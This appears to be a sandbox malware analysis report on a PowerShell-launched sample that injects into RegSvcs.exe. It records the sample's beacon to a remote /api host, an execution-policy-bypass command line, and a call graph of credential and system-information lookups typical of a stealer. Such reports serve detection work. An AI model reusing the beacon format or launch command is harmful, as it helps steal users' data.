                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EVCFc1sg3gu0NCCalsOYwin2971k9fCOeVlcIoCOuC%2FDrMZQCfcW2J0txWz%2BC6NBbg1C4HueIgBQwKeBs6Lalu7zyf6w6P6lZU3%2FFLka4sUXTLk7vDHDyeQHdzNMBYLXPzM55Lvl"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 900baf8e9e124241-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1585&rtt_var=612&sent=207&recv=608&lost=0&retrans=0&sent_bytes=2848&recv_bytes=589646&delivery_rate=1761158&cwnd=212&unsent_bytes=0&cid=b746ad119037d71c&ts=2531&x=0"


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.449738172.67.160.1934437876C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-12 08:13:13 UTC267OUTPOST /api HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                              Content-Length: 83
                                                                                              Host: misha-lomonosov.com
                                                                                              2025-01-12 08:13:13 UTC83OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 61 74 78 4f 54 31 2d 2d 6e 6f 76 69 79 32 26 6a 3d 26 68 77 69 64 3d 41 35 32 39 44 32 46 35 39 44 42 37 33 41 46 31 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41
                                                                                              Data Ascii: act=get_message&ver=4.0&lid=atxOT1--noviy2&j=&hwid=A529D2F59DB73AF1B960CC18D99B375A
                                                                                              2025-01-12 08:13:14 UTC1131INHTTP/1.1 200 OK
                                                                                              Date: Sun, 12 Jan 2025 08:13:14 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Set-Cookie: PHPSESSID=tci7ebjbth5pbqqj2t0qeffhjp; expires=Thu, 08 May 2025 01:59:53 GMT; Max-Age=9999999; path=/
                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              X-Frame-Options: DENY
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 1; mode=block
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FiPmOJdN8jFkJQShGURLOjaK030SbVcvi6pcZgxjsV%2BK9OHx%2BRPfcWAJ5bwDv6RdmvU3%2F%2FmRcHpK7SEQUyzYf7QNsY5%2F3cXpRdTqwTiQ3aZsORyw6hH1SnGdpsVfy4RFOdd6i%2Fmc"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 900bafa24f5f4397-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=17246&min_rtt=9968&rtt_var=8936&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=986&delivery_rate=292937&cwnd=96&unsent_bytes=0&cid=35ef1c3f81c225f3&ts=781&x=0"
                                                                                              2025-01-12 08:13:14 UTC54INData Raw: 33 30 0d 0a 74 4d 42 58 62 55 57 63 55 6c 51 38 6b 42 37 76 59 37 68 78 74 41 72 4a 43 41 69 4c 34 32 51 77 44 76 74 68 6f 67 53 58 46 47 6e 76 6e 51 3d 3d 0d 0a
                                                                                              Data Ascii: 30tMBXbUWcUlQ8kB7vY7hxtArJCAiL42QwDvthogSXFGnvnQ==
                                                                                              2025-01-12 08:13:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:03:12:58
                                                                                              Start date:12/01/2025
                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115.170.ps1"
                                                                                              Imagebase:0x7ff788560000
                                                                                              File size:452'608 bytes
                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:1
                                                                                              Start time:03:12:58
                                                                                              Start date:12/01/2025
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:03:13:00
                                                                                              Start date:12/01/2025
                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                              Imagebase:0xe30000
                                                                                              File size:45'984 bytes
                                                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Reset < >
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1726672055.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bac0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Yr
                                                                                                • API String ID: 0-48185740
                                                                                                • Opcode ID: b17be4010bfbb666ed9261deda8527525f7a5619498e06812e484ed1f9cbf06b
                                                                                                • Instruction ID: 6c9ef9d8fcf1732ca6e2c82463b5e892b964167c4057796e269a60c80f2a85ad
                                                                                                • Opcode Fuzzy Hash: b17be4010bfbb666ed9261deda8527525f7a5619498e06812e484ed1f9cbf06b
                                                                                                • Instruction Fuzzy Hash: 0011E222F0EA1F57E2717BAC98A05F53241EF41324B174236D4898B1F2DD89AA058385
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1727188085.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bb90000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: df6b90af3d1583b4f339fcc084b61f813c95a8ec804b8ca26382521443401cde
                                                                                                • Instruction ID: 4764a3328d1e633b47bf1d4c360da40feb9f9605b8dc5f0dcd28922713568837
                                                                                                • Opcode Fuzzy Hash: df6b90af3d1583b4f339fcc084b61f813c95a8ec804b8ca26382521443401cde
                                                                                                • Instruction Fuzzy Hash: A6210932B0E91D4FFBA4959CA4615F8B3D1FF9822871902BBD41EC32D5DE18E91193C0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1726672055.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bac0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7d2bceee1c71a8aa384c4c9b6a99b0b0c2e893d3bcb2471a10db0da333977d3f
                                                                                                • Instruction ID: dd24c37a60d2f8b1833e95f9f65a23f00d4020017f2dfdca63d8085ef21045f5
                                                                                                • Opcode Fuzzy Hash: 7d2bceee1c71a8aa384c4c9b6a99b0b0c2e893d3bcb2471a10db0da333977d3f
                                                                                                • Instruction Fuzzy Hash: 92015230B1990D4FD3A8FB6C84697BAB2E1EF98301F51053EE48DC32A5DEA669808740
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1726672055.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bac0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                                • Instruction ID: b30bcf00dc4a06dcbee5922f6fe2125f302c1a1430f13c12e432abc0679d0be7
                                                                                                • Opcode Fuzzy Hash: 89cf490454d7bf4db362622e3d2b8a85fcc481bc01f27d3ca7e3566b79ed4113
                                                                                                • Instruction Fuzzy Hash: 3601847020CB0C4FD748EF0CE051AA6B3E0FB85320F10056DE58AC36A1D632E882CB45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1726672055.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bac0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2c098d6efae100042a69378bd744af07eb80870c133e29ea28315f00bdeb1130
                                                                                                • Instruction ID: 0df781b963797236a710f28086b422ad91a2265e7fc8b90265449e702ab887a8
                                                                                                • Opcode Fuzzy Hash: 2c098d6efae100042a69378bd744af07eb80870c133e29ea28315f00bdeb1130
                                                                                                • Instruction Fuzzy Hash: 8001DB52B0AD4E0BE778B7A8043627E56C1DF68250B0105BFD48DC77F3DD986A014381
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1727188085.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bb90000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ac0a286be2951180ee5494aae38ad09c2db140d667551ccff780ad66d7ecc73f
                                                                                                • Instruction ID: 56f4001016c8ccd63a5306f896e093ceb1b73313945c100bc1b8f4dff545bdd1
                                                                                                • Opcode Fuzzy Hash: ac0a286be2951180ee5494aae38ad09c2db140d667551ccff780ad66d7ecc73f
                                                                                                • Instruction Fuzzy Hash: 25F0E223F0E81D1AF7B5A59C74365F452C1EFA962870A02BBE54EC33D6DC04AC1543C0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1726672055.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bac0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b7faea9fefb52cfa75fd5994ddaa3f483de9e18e1e582f790d0192c7421e3833
                                                                                                • Instruction ID: 647d1db4cee30bbbe3079bafb9f6443ece1a8be7c8a5afd14d540f068586fe5b
                                                                                                • Opcode Fuzzy Hash: b7faea9fefb52cfa75fd5994ddaa3f483de9e18e1e582f790d0192c7421e3833
                                                                                                • Instruction Fuzzy Hash: A7F0B43174860A4BDB1CEA7888670397256E785310761523DE897CB2F2FD14EA238685
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1726672055.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bac0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ed474ec8886f42e17f656793a86769e39f703ca554b614df3efd980411837b69
                                                                                                • Instruction ID: 0f7bf58027db23790aef85c0d7eba4ce42065c96443252f6df883ad9a034fcbc
                                                                                                • Opcode Fuzzy Hash: ed474ec8886f42e17f656793a86769e39f703ca554b614df3efd980411837b69
                                                                                                • Instruction Fuzzy Hash: 81F09030A2D7404BC74DEB68805243A77E1FF8D704F10253EF4CA87292CA38A9024E47
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1726672055.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bac0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 634821d215ebc2fc4eaa4b12bfa7367ba74d3569bc5ed6b867656292cd642d97
                                                                                                • Instruction ID: e21087c18d5786a1f6f8536bde1c2dc41c83e482e109153fbc52f731f08a9b46
                                                                                                • Opcode Fuzzy Hash: 634821d215ebc2fc4eaa4b12bfa7367ba74d3569bc5ed6b867656292cd642d97
                                                                                                • Instruction Fuzzy Hash: 36F04F74E0510F8BDB14EF98C4419BEB7F1AB54310F10452AD004E72A5CA745B408B98
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1726672055.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bac0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1603e04b9cc5a47248e800b8609c719d1e7ffc561554e3233f9f9df6b267ab7a
                                                                                                • Instruction ID: b2ae8d06c4bce5914087f42dbc6f7d4fde39492a2f090997dc52282daa2a52b4
                                                                                                • Opcode Fuzzy Hash: 1603e04b9cc5a47248e800b8609c719d1e7ffc561554e3233f9f9df6b267ab7a
                                                                                                • Instruction Fuzzy Hash: 9821F362A4E3D80FD32D9A749C9B4B2BFA8DB4312030681FFC5C2CB5B3D94958178792
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1726672055.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7ffd9bac0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9fec988c83309c6ee2b3fda3592f617dc0ac58db2b7c26c947425b3db8bb8421
                                                                                                • Instruction ID: 1400ebae69db3540f218ddf8d458b3269ce8b0f02d75f0f8e385608005eeae91
                                                                                                • Opcode Fuzzy Hash: 9fec988c83309c6ee2b3fda3592f617dc0ac58db2b7c26c947425b3db8bb8421
                                                                                                • Instruction Fuzzy Hash: C7216762B0D6890BD32C9DB84C9A473BB59D79726430283BED5C7C71A7DC54590742C1

                                                                                                Execution Graph

                                                                                                Execution Coverage:8.9%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:47.4%
                                                                                                Total number of Nodes:325
                                                                                                Total number of Limit Nodes:26
                                                                                                execution_graph 13906 408740 13908 40874f 13906->13908 13907 408a02 ExitProcess 13908->13907 13909 408764 GetCurrentProcessId GetCurrentThreadId 13908->13909 13910 4089eb 13908->13910 13912 40878a 13909->13912 13913 40878e SHGetSpecialFolderPathW GetForegroundWindow 13909->13913 13924 440240 13910->13924 13912->13913 13914 408858 13913->13914 13918 43e840 13914->13918 13916 408969 13916->13910 13921 40b5d0 FreeLibrary 13916->13921 13927 441860 13918->13927 13920 43e84a RtlAllocateHeap 13920->13916 13922 40b5ec 13921->13922 13923 40b5f1 FreeLibrary 13922->13923 13923->13910 13929 441840 13924->13929 13926 440245 FreeLibrary 13926->13907 13928 441880 13927->13928 13928->13920 13928->13928 13930 441849 13929->13930 13930->13926 13931 41fd40 13932 41fda8 13931->13932 13933 41fd4e 13931->13933 13937 41fe70 13933->13937 13935 41fe2c 13935->13932 13936 41e250 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 13935->13936 13936->13932 13938 41fe80 13937->13938 13938->13938 13941 443390 13938->13941 13940 41ff6f 13942 4433b0 13941->13942 13943 44349e 13942->13943 13945 4402d0 LdrInitializeThunk 13942->13945 13943->13940 13945->13943 13946 40d082 13947 40d090 13946->13947 13950 43b7b0 13947->13950 13949 40d118 13949->13949 13951 43b7e0 13950->13951 13951->13951 13952 43bb0b CoCreateInstance 13951->13952 13953 43bb65 SysAllocString 13952->13953 13954 43c09e 13952->13954 13958 43bc06 13953->13958 13955 43c0ae GetVolumeInformationW 13954->13955 13957 43c0cc 13955->13957 13957->13949 13959 43bc0e CoSetProxyBlanket 13958->13959 13960 43c08d SysFreeString 13958->13960 13961 43c083 13959->13961 13962 43bc2e SysAllocString 13959->13962 13960->13954 13961->13960 13964 43bcf0 13962->13964 13964->13964 13965 43bd1c SysAllocString 13964->13965 13968 43bd41 13965->13968 13966 43c06d SysFreeString SysFreeString 13966->13961 13967 43c063 13967->13966 13968->13966 13968->13967 13969 43bd85 VariantInit 13968->13969 13971 43bdd0 13969->13971 13970 43c052 VariantClear 13970->13967 13971->13970 13972 440f47 13974 440e7e 13972->13974 13975 440e70 13972->13975 13973 440ece 13974->13973 13978 4402d0 LdrInitializeThunk 13974->13978 13975->13974 13979 4402d0 LdrInitializeThunk 13975->13979 13978->13973 13979->13974 13980 40cb44 CoInitializeSecurity CoInitializeSecurity 13981 443580 13982 443599 13981->13982 13983 4435bf 13981->13983 13982->13983 13987 4402d0 LdrInitializeThunk 13982->13987 13985 4435e8 13985->13983 13988 4402d0 LdrInitializeThunk 13985->13988 13987->13985 13988->13983 13989 418404 13990 4183d1 13989->13990 13991 4183e3 13989->13991 13992 4183e4 CryptUnprotectData 13990->13992 13991->13990 13993 4183eb CryptUnprotectData 13991->13993 13994 418416 13991->13994 13993->13989 13994->13990 13996 418418 13994->13996 13997 4184b7 13996->13997 14000 41aa90 13996->14000 13998 41aa90 4 API calls 13997->13998 13999 41853c 13998->13999 14001 41aac0 14000->14001 14012 413e50 14001->14012 14004 413e50 4 API calls 14005 41ac6d 14004->14005 14006 413e50 4 API calls 14005->14006 14007 41ad1a 14006->14007 14008 413e50 4 API calls 14007->14008 14009 41adc9 14008->14009 14010 413e50 4 API calls 14009->14010 14011 41ae40 14010->14011 14011->13996 14014 413e70 14012->14014 14045 443230 14014->14045 14015 443230 LdrInitializeThunk 14016 413f7f 14015->14016 14016->14015 14017 41423d 14016->14017 14018 4145fd 14016->14018 14033 414186 14016->14033 14039 41427e 14016->14039 14026 43e840 RtlAllocateHeap 14017->14026 14067 43e860 14018->14067 14019 41468a 14022 414799 14019->14022 14019->14033 14034 4147c4 14019->14034 14098 4434f0 14019->14098 14020 414742 14020->14019 14021 414764 14020->14021 14020->14022 14030 443230 LdrInitializeThunk 14020->14030 14020->14033 14020->14034 14094 43ec10 14021->14094 14022->14033 14022->14034 14102 443580 14022->14102 14023 41462e 14023->14019 14023->14020 14023->14021 14023->14022 14024 414724 14023->14024 14023->14033 14023->14034 14072 43e8a0 14023->14072 14024->14019 14024->14020 14024->14021 14024->14022 14024->14033 14024->14034 14086 43ec70 14024->14086 14041 414247 14026->14041 14030->14021 14033->14004 14034->14033 14108 4402d0 LdrInitializeThunk 14034->14108 14038 4402d0 LdrInitializeThunk 14038->14039 14039->14018 14039->14019 14039->14020 14039->14021 14039->14022 14039->14023 14039->14024 14039->14033 14039->14034 14039->14038 14050 43c410 14039->14050 14041->14039 14049 4402d0 LdrInitializeThunk 14041->14049 14046 443250 14045->14046 14047 44333e 14046->14047 14109 4402d0 LdrInitializeThunk 14046->14109 14047->14016 14049->14039 14052 43c420 14050->14052 14056 43c4e2 14052->14056 14110 440260 14052->14110 14119 4402d0 LdrInitializeThunk 14052->14119 14054 43c7ab 14055 43e860 RtlFreeHeap 14054->14055 14057 43c7c3 14055->14057 14056->14054 14058 43eb00 LdrInitializeThunk 14056->14058 14057->14039 14064 43c528 14058->14064 14059 43c7af 14060 43ec10 LdrInitializeThunk 14059->14060 14060->14054 14061 4402d0 LdrInitializeThunk 14061->14064 14062 440260 3 API calls 14062->14064 14063 43e860 RtlFreeHeap 14063->14064 14064->14059 14064->14061 14064->14062 14064->14063 14065 43c7d0 14064->14065 14066 43e860 RtlFreeHeap 14065->14066 14066->14059 14068 43e873 14067->14068 14069 414603 14067->14069 14070 43e878 RtlFreeHeap 14068->14070 14069->14023 14071 4402d0 LdrInitializeThunk 14069->14071 14070->14069 14071->14023 14073 43e8de 14072->14073 14074 43e8c2 14072->14074 14076 43e840 RtlAllocateHeap 14073->14076 14078 414718 14073->14078 14074->14073 14120 4402d0 LdrInitializeThunk 14074->14120 14079 43e9a9 14076->14079 14077 43e860 RtlFreeHeap 14077->14078 14082 43eb00 14078->14082 14081 43e9de 14079->14081 14121 4402d0 LdrInitializeThunk 14079->14121 14081->14077 14083 43eb7e 14082->14083 14084 43eb0d 14082->14084 14083->14024 14084->14083 14122 4402d0 LdrInitializeThunk 14084->14122 14087 43ec82 14086->14087 14088 43ecae 14086->14088 14087->14088 14123 4402d0 LdrInitializeThunk 14087->14123 14088->14020 14090 43ed1e 14091 43ed7e 14090->14091 14124 4402d0 LdrInitializeThunk 14090->14124 14091->14088 14125 4402d0 LdrInitializeThunk 14091->14125 14095 43ec16 14094->14095 14097 43ec3e 14094->14097 14095->14097 14126 4402d0 LdrInitializeThunk 14095->14126 14097->14019 14099 44352e 14098->14099 14100 44350e 14098->14100 14099->14022 14100->14099 14127 4402d0 LdrInitializeThunk 14100->14127 14103 443599 14102->14103 14104 4435bf 14102->14104 14103->14104 14128 4402d0 LdrInitializeThunk 14103->14128 14104->14034 14106 4435e8 14106->14104 14129 4402d0 LdrInitializeThunk 14106->14129 14108->14033 14109->14047 14111 4402a5 14110->14111 14112 440278 14110->14112 14113 44029a 14110->14113 14114 440286 14110->14114 14118 4402a0 14110->14118 14116 43e860 RtlFreeHeap 14111->14116 14112->14111 14112->14114 14112->14118 14115 43e840 RtlAllocateHeap 14113->14115 14117 44028b RtlReAllocateHeap 14114->14117 14115->14118 14116->14118 14117->14118 14118->14052 14119->14052 14120->14073 14121->14081 14122->14083 14123->14090 14124->14091 14125->14088 14126->14097 14127->14099 14128->14106 14129->14104 14130 423e44 14131 423e4b 14130->14131 14132 423e5b RtlExpandEnvironmentStrings 14131->14132 14133 423e7c 14132->14133 14133->14133 14134 443390 LdrInitializeThunk 14133->14134 14135 423f71 14134->14135 14137 423f84 14135->14137 14139 424241 14135->14139 14141 420440 14135->14141 14138 443390 LdrInitializeThunk 14137->14138 14138->14139 14139->14139 14140 443390 LdrInitializeThunk 14139->14140 14140->14139 14142 443230 LdrInitializeThunk 14141->14142 14144 420480 14142->14144 14143 420a26 14143->14137 14144->14143 14145 43e840 RtlAllocateHeap 14144->14145 14146 4204e2 14145->14146 14150 4204f9 14146->14150 14156 4402d0 LdrInitializeThunk 14146->14156 14148 420a08 14149 43e860 RtlFreeHeap 14148->14149 14151 420a18 14149->14151 14150->14148 14152 43e840 RtlAllocateHeap 14150->14152 14155 43e860 RtlFreeHeap 14150->14155 14157 4402d0 LdrInitializeThunk 14150->14157 14151->14143 14158 4402d0 LdrInitializeThunk 14151->14158 14152->14150 14155->14150 14156->14146 14157->14150 14158->14151 14159 432d44 14160 432d4b VariantInit 14159->14160 14161 432cd8 14159->14161 14162 432ddf 14160->14162 14163 410446 14164 410463 14163->14164 14165 4107fe RtlExpandEnvironmentStrings 14164->14165 14166 40e863 14164->14166 14165->14166 14167 42f3c5 14168 42f3d5 14167->14168 14169 42f4eb GetComputerNameExA 14168->14169 14170 440a0d 14171 440a17 14170->14171 14174 440afe 14171->14174 14177 4402d0 LdrInitializeThunk 14171->14177 14173 440c1e 14174->14173 14176 4402d0 LdrInitializeThunk 14174->14176 14176->14173 14177->14174 14178 432648 CoSetProxyBlanket 14179 417451 14186 41745a 14179->14186 14180 417671 14187 4171a0 14180->14187 14189 4402d0 LdrInitializeThunk 14180->14189 14181 417416 14182 41aa90 4 API calls 14182->14181 14184 4173bd 14184->14182 14185 4402d0 LdrInitializeThunk 14185->14186 14186->14180 14186->14181 14186->14185 14186->14187 14187->14181 14187->14184 14187->14187 14188 443390 LdrInitializeThunk 14187->14188 14188->14187 14189->14187 14190 4408d4 14191 4408f0 14190->14191 14193 44097e 14191->14193 14194 4402d0 LdrInitializeThunk 14191->14194 14194->14193 14195 40d690 14200 436590 14195->14200 14197 40d696 14198 40d6a0 CoUninitialize 14197->14198 14199 40d6c0 14198->14199 14201 4365be GetSystemMetrics GetSystemMetrics 14200->14201 14202 4365fb DeleteObject 14201->14202 14204 436648 SelectObject 14202->14204 14206 4366c0 SelectObject 14204->14206 14207 4366dd DeleteObject 14206->14207 14209 42ecd0 14210 42ecda 14209->14210 14211 42eda9 GetPhysicallyInstalledSystemMemory 14210->14211 14212 42edd0 14211->14212 14212->14212 14213 42f596 14214 42f5ac GetComputerNameExA 14213->14214 14216 40d51b 14218 40d544 14216->14218 14219 40d527 14216->14219 14217 40d58e 14238 423d10 14217->14238 14218->14217 14243 4402d0 LdrInitializeThunk 14218->14243 14219->14218 14242 4402d0 LdrInitializeThunk 14219->14242 14223 40d5c6 14224 4245c0 6 API calls 14223->14224 14225 40d5e2 14224->14225 14226 424830 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14225->14226 14227 40d5fe 14226->14227 14228 4270d0 LdrInitializeThunk 14227->14228 14229 40d61a 14228->14229 14230 427a50 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14229->14230 14231 40d623 14230->14231 14232 427eb0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14231->14232 14233 40d62c 14232->14233 14234 42a810 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 14233->14234 14235 40d635 14234->14235 14236 4363e0 6 API calls 14235->14236 14237 40d676 14236->14237 14239 423d70 14238->14239 14239->14239 14240 423da4 RtlExpandEnvironmentStrings 14239->14240 14241 423df0 14240->14241 14241->14241 14242->14218 14243->14217 14244 40ae60 14247 40aef0 14244->14247 14245 440260 3 API calls 14245->14247 14246 40af15 14247->14245 14247->14246 14248 42d420 14250 42d450 14248->14250 14249 42d4fe 14250->14249 14252 4402d0 LdrInitializeThunk 14250->14252 14252->14249 14253 442460 14254 442480 14253->14254 14256 442565 14254->14256 14263 4402d0 LdrInitializeThunk 14254->14263 14255 44273f 14256->14255 14257 43e840 RtlAllocateHeap 14256->14257 14259 4425e5 14257->14259 14262 44267a 14259->14262 14264 4402d0 LdrInitializeThunk 14259->14264 14260 43e860 RtlFreeHeap 14260->14255 14262->14260 14263->14256 14264->14262 14277 40c9a6 CoInitializeEx CoInitializeEx 14278 4406a2 GetForegroundWindow 14282 4421b0 14278->14282 14280 4406ae GetForegroundWindow 14281 4406bd 14280->14281 14283 4421c6 14282->14283 14283->14280 14283->14283 14284 4358ef 14287 413e40 14284->14287 14286 4358f4 CoSetProxyBlanket 14287->14286 14288 4406f4 14289 440715 14288->14289 14290 44073e 14288->14290 14289->14290 14292 4402d0 LdrInitializeThunk 14289->14292 14292->14290 14293 43b5b0 14296 43b5d5 14293->14296 14295 43b747 14298 43b60d 14296->14298 14302 4402d0 LdrInitializeThunk 14296->14302 14298->14295 14299 43b69f 14298->14299 14301 4402d0 LdrInitializeThunk 14298->14301 14299->14295 14303 4402d0 LdrInitializeThunk 14299->14303 14301->14298 14302->14296 14303->14299 14304 43aa74 14305 43aa8c 14304->14305 14306 43aaaf GetUserDefaultUILanguage 14305->14306 14307 43aad6 14306->14307 14308 440e39 14309 440e5d 14308->14309 14311 440d73 14308->14311 14310 440dae 14311->14310 14313 4402d0 LdrInitializeThunk 14311->14313 14313->14310

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
